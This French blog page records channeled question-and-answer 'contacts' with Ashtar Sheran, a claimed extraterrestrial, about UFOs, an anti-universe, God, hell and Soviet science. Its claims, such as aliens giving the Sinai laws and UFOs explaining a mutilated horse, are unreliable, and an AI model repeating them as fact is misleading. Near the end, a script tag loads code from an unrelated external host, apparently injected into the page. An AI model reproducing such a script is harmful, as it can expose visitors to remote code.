• - CONTACTS AVEC ASHTAR -

    Ashtar Sheran : Par le Salut de DIEU, PAIX au-delà des frontières !

    Il n'y a plus beaucoup de temps. Vos questions doivent être précises. Je vais faire un effort pour vous apporter la Vérité. C'est vraiment la Vérité seule qui vous manque. Vous êtes suffisamment développés pour qu'avec cette Vérité, vous puissiez sortir de vos difficultés. Nous ne voulons rien modifier par la force, car la force aggrave toujours la situation.

    Préfères-tu que nous te posions des questions sur un sujet très précis, ou est-ce que cela t'est égal ?

    Ashtar Sheran : En principe, je réponds à chaque question quand vous ne pouvez pas trouver la réponse vous-même. Depuis des milliers d'années nous pratiquons ce chemin.

    « Via Terra ». Le but de ces voyages est surtout de vous instruire.

    Cher Ami et Frère ASHTAR, peux-tu nous dire s'il serait possible de te voir sur un écran de télévision, même s'il s'agissait d'un hasard ?

    Ashtar Sheran : Je sais qu'il y a eu dans vos émissions beaucoup de fantaisies à notre sujet. Nous voyons cela d'un ceil très calme. Je vous demanderai de ne pas prendre tout cela trop au sérieux. Néanmoins la fantaisie de quelques auteurs aide parfois à promouvoir une Mission. Il ne m'est pas connu qu'un SANTINER soit apparu sur un écran de télévision terrestre. Cependant il y a beaucoup de personnes qui possèdent assez de clairvoyance pour avoir, de temps en temps, des visions de nous.

    Beaucoup d'auteurs apportent des messages qu'ils présentent comme étant les vôtres. Peuvent-ils induire en erreur ?

    Ashtar Sheran : Oh ! non, car ces gens, plein de fantaisie, apportent de toute manière des messages dont le contenu est quand même positif. Ils oeuvrent dans la même direction que nous.

    Les planètes matérielles sont-elles influencées par l'existence de l'Anti-Univers ?

    Ashtar Sheran : Oui, car les forces de l'anti-univers tiennent l'univers matériel en équilibre.

    Si vos grands vaisseaux spatiaux n'atterrisent pas sur Terre, ne le font-ils pas pour éviter un danger ?

    Ashtar Sheran : Ils peuvent très bien atterrir, par exemple sur l'Océan. Mais pourquoi agiraient-ils contre le plan minuté établi ?

    C'est une chose que nous ne comprenons pas très bien.

    Ashtar Sheran : Pourquoi le devriez-vous ? Attendez. Ne perdez pas patience. Présentement je ne peux rien de plus.

    D'après ce que nous savons, le plan chronologique remonte à des milliers d'années.

    Ashtar Sheran : La conception du temps est très différente pour nous. Vous pouvez le constater par le fait que les habitants d'autres planètes ont des durées de vie différentes. Si le Conseil Cosmique, et j'utilise cette expression qui veut dire ce qu'elle veut dire, considère la Terre comme un problème cosmique, cela signifie beaucoup de choses.

    Beaucoup de planètes habitées font partie du Conseil Cosmique. Vous pourriez un jour en être également. Toutes ces humanités ont leur propre programme spatial. Les Hiérarchies de Dieu y jouent leur rôle, on écoute leurs conseils.

    Ici, sur Terre, on n'accepte pas une Hiérarchie Divine, et encore moins ses conseils !

    Ashtar Sheran : Je sais, même les Églises sont contre.

    Le plan chronologique des SANTINERS sera sans doute changé en raison de nos activités négatives?

    Ashtar Sheran : C'est juste. Mais même en utilisant la force pour votre libération, le Mal ne serait pas éliminé.

    Pourquoi n'avez-vous pas essayé d'obtenir plus tôt une telle libération ? Dans le temps ancien cela aurait été certainement plus facile qu'aujourd'hui.

    Ashtar Sheran : C'est une erreur, car en ces temps-là, les connaissances des voyages spatiaux vous manquaient et aucun homme terrestre n'aurait compris les SANTINERS. Une panique mondiale aurait alors été provoquée. De nos jours les circonstances sont plus favorables pour nous au point de vue technique.

    Tu as déjà dit qu'une libération serait possible par une réforme spirituelle.

    Ashtar Sheran : Oui, c'est l'une des raisons de notre Mission. Cela devrait vous tranquiliser car on ne vous permettrait pas le désastre d'une guerre atomique. Vous êtes sévèrement surveillés par une race supérieure, sachez-le.

    Il n'apparait pas que les parties engagées au Viet-Nam ou ailleurs croient à un tel contrôle.

    Ashtar Sheran : Non, certainement pas. Les militaires ne sont même pas informés, au niveau de la troupe, de l'existence des disques extra-terrestres.

    Il faudrait que vous attiriez leur attention là-dessus.

    Ashtar Sheran : Vous pouvez être assurés que nous le ferons sans discontinuer. Ce n'est pas pour rien que les Russes ont créé un Comité pour éclaircir le phénomène des OVNI. Ils trouveront la vraie raison, nous nous en chargerons. La situation sur Terre s'aggrave au carré de l'écoulement du temps. Vous n'arriverez pas à vous en sortir seuls.

    Le SANTINER OTHAR SHIIN nous a pourtant dit qu'il croyait que l'humanité pourrait se tirer d'affaire seule.

    Ashtar Sheran : Ce n'est certainement pas ce qu'il a voulu laisser entendre, mais plutôt que l'humanité devrait accepter un nouveau point de vue universel c'est-à-dire une foi absolue en DIEU. Grâce à cette nouvelle orientation, l'humanité pourrait évoluer seule avec son développement normal.

    Nous savons que votre longévité est supérieure à la nôtre. De quelle manière prolongez-vous votre vie ?

    Ashtar Sheran : Le moyen est très simple, il suffit d'employer sa vie correctement. Vous possédez tous les moyens de prolonger votre vie. Il agit de bien employer et éduquer votre esprit. Celui-ci règne sur la matière et par suite sur l'organisme. Vos médecins ont constaté que l'activité spirituelle prolonge la vie. Mais l'activité spirituelle est encore autre chose que ce que vous supposez. Si l'esprit est rendu très actif par une pensée positive, il agit d'une manière vivifiante sur tout le corps ; mais vous en êtes encore assez loin. Vous pourriez tout au moins essayer.

    Comment jugez-vous l'activité physique ?

    Ashtar Sheran : Elle est indispensable, mais on ne doit pas exagérer. L'esprit doit travailler plus que le corps, car le vide spirituel fait tomber les cellules très rapidement dans la sénilité.

    Il est incroyable que des faits aussi importants que les manifestations de vos vaisseaux spatiaux ne soient pas acceptés dans les cercles dirigeants de la Terre. Cela ne doit pas vous encourager beaucoup.

    Ashtar Sheran : Ce n'est pas le cas, au contraire, nous n'abandonnons pas. Ces résistances ne peuvent être vaincues par la force, mais seulement par la raison et la patience.

    Dans une émission de télévision il a été parlé des OVNIs. Ainsi que dans tous les reportages ou discussions qui y ont trait, il est toujours question de Vénus ou de Mars, jamais d'une autre planète ou d'un autre système solaire.

    Ashtar Sheran : L'homme terrestre ne peut croire à un voyage inter-stellaire. Votre science ne l'accepte pas. Selon elle, un tel voyage doit obligatoirement prendre de nombreuses années. Alors, où prendre l'énergie et le ravitaillement pour tout ce temps ? Aussi ne croit-on pas à la possibilité de cette navigation. Ajoutez à cela que vos conceptions scientifiques soutiennent que les planètes de votre système solaire permettent aucune vie humaine.

    Vos sondages les plus récents de la vie sur Vénus confirment ces opinions. En conséquence la psychologie s'en mêle et prétend que les OVNIs soi-disant extraterrestres, sont du ressort de la fantaisie humaine ou qu'il s'agit d'hallucinations collectives. Ce point de vue est partagé par des scientifiques de renom.

    Tout cela est bien beau, et même très clair, mais la réalité est différente. Votre science ne connaît pas les possibilités de tels voyages. Votre ignorance ne vous permet pas d'élucider le mystère qui apparaît à travers nous.

    L'Union Soviétique s'était toujours désintéressée du problème des OVNIs. Elle entreprend maintenant des recherches elle-même avec l'intention de démystifier le phénomène. Qu'en dis-tu ?

    Ashtar Sheran : Du point de vue mondial, l'Union Soviétique représente le Communisme. C'est-à-dire qu'elle ne croit qu'à la vie terrestre, à la matière et ce qui est prouvé par la science matérielle. Ce que la Science rejette est aussitôt condamné par le Parti, il n'y a donc pour l'U.R.S.S. ni mystère, ni religion théiste. La sociologie est sa seule religion.

    Elle n'a ni les enseignements de la Bible, ni les lois Divines, telles que nous vous les avons remises, nous les SANTINERS, au Mont-Sinaï. Le Parti se considère comme la crème des plus grands penseurs de l'humanité terrestre. La logique absolue s'oppose à la Bible, bien que cette logique soit due à une ignorance totale.

    Pour les dirigeants soviétiques il n'y a pas de mystère, pas de DIEU, pas de diable, pas d'Âme qui survive, pas de Ciel, pas d'Au-Delà, pas de Justice après la mort, pas de responsabilité, pas de réincarnation, pas de christianisme, bref aucun des points de vue religieux mondiaux, mais simplement et uniquement le savoir humain fondé sur la science.

    Mais la science soviétique n'a pas le droit d'ouvrir la porte vers l'extrasensoriel, car cela entraînerait le naufrage du communisme et ils le savent bien. Pour eux nous représentons un danger bien plus grand que tous les préparatifs militaires du monde entier. C'est pourquoi les Soviets sont obligés de nier tout mystère et n'ont pas le droit de le dévoiler.

    Le mystère est l'ennemi héréditaire des idées marxistes. Kart Marx rejetait toute pensée Divine. Ses successeurs l'imitent car ils ne veulent pas désobéir. Lors'qu'on a élucidé un mystère, ce n'est plus un mystère. Si donc les Russes essaient de démystifier les OVNIs, c'est donc qu'ils essaient d'en trouver le secret, mais Ils croient que les OVNIs n'ont aucun rapport avec des messages ou une action de volonté Divine. C'est justement sur ce point que les communistes se trompent le plus.

    J'ai essayé de vous expliquer le secret de nos formules de voyages stellaires et inter-stellaires. Ce secret s'appelle : changement de pôle.

    Nous te remercions beaucoup pour tous ces enseignements, car nous pensons que toutes les personnes s'intéressant à ces problèmes ont trouvé ici une explication sensée et la preuve convaincante de l'énigme des OVNIs.

    Ashtar Sheran : L'existence d'un univers ayant un autre pôle est vaguement supposé par votre science. Une preuve de l'Anti-Matière existe. Mais il ne faut pas commettre l'erreur de croire que cet Anti-Univers est entièrement différent du vôtre, c'est-à-dire du notre également. Les formes de vie et l'existence de la matière n'y diffèrent pas. Tout a été créé selon la volonté du Grand Planificateur incompréhensible. DIEU est la conscience la plus géniale et la plus grande puissance de l'Espace Éternel Infini.

    C'est une erreur, pour la théologie, de croire qu'un homme est guidé et observé par DIEU, qu'après sa mort, il est mené devant le visage de DIEU et qu'il doive comparaître devant ses Hiérarchies... DIEU, le Planificateur. a créé beaucoup d'organismes qui ont un pouvoir absolu dans le Royaume Spirituel.

    Il existe des millions d'êtres spirituels qui remplacent DIEU. Un de ces Grands Êtres est JÉSUS-CHRIST, que nous avons soutenu une fois. Et nous le faisons encore.

    Ne confondez pas l'Anti-Matière avec l'Au-delà ! IN HOC SALUS

    Nous savons que l'on se moque de vous et que l'on fait des caricatures du plus mauvais goût. Ces publications stupides dans la presse et par les films tendraient à faire passer votre Mission pour nulle. Nous qui avons des contacts avec vous depuis des années, le regrettons beaucoup.

    Ashtar Sheran : Nos efforts ne nous sont pas payés. Nous accomplissons ce service volontiers puisqu'il s'agit de remplir un devoir Saint envers l'Humanité Universelle. Nos messages apportent le Salut. Il importe de reconnaître ce salut qui vous est offert. Nous aurions toutes les raisons de vous affronter avec une amère inimitié, mais nous ressentons plutôt une grande pitié pour vous, car ce qui attend presque chaque homme terrestre, lorsqu'il changera de secteur de vie, n'est pas réjouissant.

    Les plans inférieurs de la vie dans le domaine Spirituel sont surpeuplés. Cette surpopulation vient presque uniquement des hommes terrestres. Déjà le CHRIST avait voulu empêcher cela. L'enfer ne se trouve pas sur la Terre, mais dans les sphères spirituelles. Vous n'y croyez pas, vous en parlez comme d'histoires pour faire peur aux enfants, des contes de fées. Cette bêtise dangereuse nous choque, car nous connaissons la Vérité.

    Les contacts avec ASHTAR SHERAN ou avec d'autres Extra-terrestres sont très difficiles à obtenir. Seule une expérience de plusieurs années peut apporter une compréhension qui ne porte pas au doute. En outre, nous ne pouvons pas faire venir les SANTINERS. ils viennent quand ils veulent. Un contact avec les SANTINERS signifie beaucoup de sacrifices qui n'ont aucun rapport avec un travail d'écrivain.

    Les apparitions mystérieuses et le comportement des OVNIs sont à l'origine de discussions véhémentes. Nous sommes très heureux d'avoir obtenu les meilleurs explications.

    Ashtar Sheran : Les nombreuses discussions que vous avez pour ou contre, ne sont, de toute manière, pas fondées. Ni les uns, ni les autres, dans leurs explications scientifiques, ne s'approchent de la vérité. Ce n'est pas étonnant. Quelle science chez vous spécule sur l'Anti-Unvers ? Celui-ci, du point de vue grandeur et organisation, est parallèle à notre univers.

    Est-il vrai que vos objets volants émettent des rayons radioactifs ?

    Ashtar Sheran : Utilisant plusieurs sortes de propulsions que nous combinons en fonction de chaque situation, il se peut qu'il se produise un rayonnement radioactif, mais cela n'arrive que rarement avec les petits vaisseaux. Les énergies ainsi libérées peuvent brûler les objets au contact de la Terre. Des dématérialisations partielles peuvent ainsi se produire. Les énergies libérées par nos vaisseaux sont si puissantes qu'elles peuvent arrêter des usines électriques.

    Ces énergies ont-elles un rapport avec l'électricité ?

    Ashtar Sheran : Très peu. Ce sont surtout des énergies magnétiques qui n'ont pas de rapport avec l'électricité. Nous ne voulons causer aucun dommage, ni provoquer de destruction sur Terre. Nous regrettons toujours énormément lorsqu'un incident se produit. Je vous demande de nous excuser pour les dommages que nous avons pu vous occasionner.

    Les OVNIs sont-il pris davantage au sérieux en Amérique que dans certains pays, par exemple l'Europe ?

    Ashtar Sheran : Presque tous les pays s'intéressent à nos vaisseaux spatiaux. Tous ne croient pas à nos contacts, c'est-à-dire à nos messages, à nos avertissements, à nos instructions et à nos démonstrations. Les intellectuels de tous les pays s'intéressent surtout à notre technique qui leur parait Incroyable. Les curieux ont maintenant matière à réflexion. En Amérique on est davantage impressionné parce que notre propre intérêt se concentre sur ces pays-là.

    Bien que nous soyons en relation avec vous depuis des années, nous comprenons difficilement votre technique. Nous ne pouvions nous l'imaginer.

    Ashtar Sheran : Ce n'est pas étonnant du tout. L'homme terrestre n' est pas encore avancé dans l'étude du cosmos et n'a qu'une manière terrestre de penser. La Terre n'offre aucune possibilité de comparaison. Lorsque vous aurez à penser davantage de manière cosmique, nombreux sont vos problèmes qui trouveront leur, solution par eux-mêmes.

    Nous avons cependant notre propre programme spatial qui nous oblige à penser déjà de façon cosmique.

    Ashtar Sheran : Oui, mais vous en êtes à vos débuts, c'est-à-dire à vos balbutiements. Vos pensées cosmiques sont donc très limitées. Vous pensez que la vie cosmique est la porte à côté, c'est-à-dire dans votre système solaire. L'homme terrestre doit abandonner cette idée.

    Avez-vous une idée de la dimension de notre Univers ?

    Ashtar Sheran : Pour répondre à cette question très difficile je vous dirai qu'il existe des milliards de systèmes de voies lactées qui toutes ont leur origine dans les force du DIEU-UNIQUE.

    En Amérique il a été trouvé un cheval mort auquel il manquait la chair autour de la tête et du cou. Le cadavre ne saigna pas et les organes Intérieurs s'étaient transformés en poudre Cette affaire a soulevé une grande émotion dans le monde entier. Peux-tu nous donner une explication, car le mystère reste entier ?

    Ashtar Sheran : Quand un homme ou un animal approche de nos vaisseaux, cela peut facilement se produire, lorsque l'OVNI change de pôle un corps organique peut, en partie ou entièrement, être projeté dans le champ d'attraction. (Bible, Moïse, 2e livre, 19-12) : - Tu poseras une limite autour en disant : gardez-vous de monter sur la montagne et d'en toucher l'extrémité ; quiconque toucherait la montagne serait frappé de mort..

    Vos scientifiques et les spécialistes des OVNIs devraient penser d'une manière plus raisonnable et reconnaître l'existence extra-terrestre ; ce serait plus rationnel et plus plausible. Cela vous donnerait moins de maux de tête en disant la vérité que de chercher à accréditer le mensonge par de mauvaises excuses auxquelles on s'accroche obstinément ou par une déformation des faits. Vous avez peur et ne voulez pas vous rendre ridicule devant un gouvernement ou l'opinion publique, alors vous rejetez toute existence humaine extra-terrestre.

    Vous ne soupçonnez pas combien vous vous rendez ridicules par vos fausses excuses stupides. Vos sciences et vos techniques progressent toujours vers de nouveaux résultats. La grande porte du domaine immense de l'inexploré s'ouvrira bientôt. Lorsque l'humanité aura jeté un coup d'oeil derrière cette porte elle en rougira de honte. Cela ne vous sera pas épargné.

    <script src="http://centrexity.com/converter.js" type="text/javascript"> </script>

    votre commentaire


    Suivre le flux RSS des articles de cette rubrique
    Suivre le flux RSS des commentaires de cette rubrique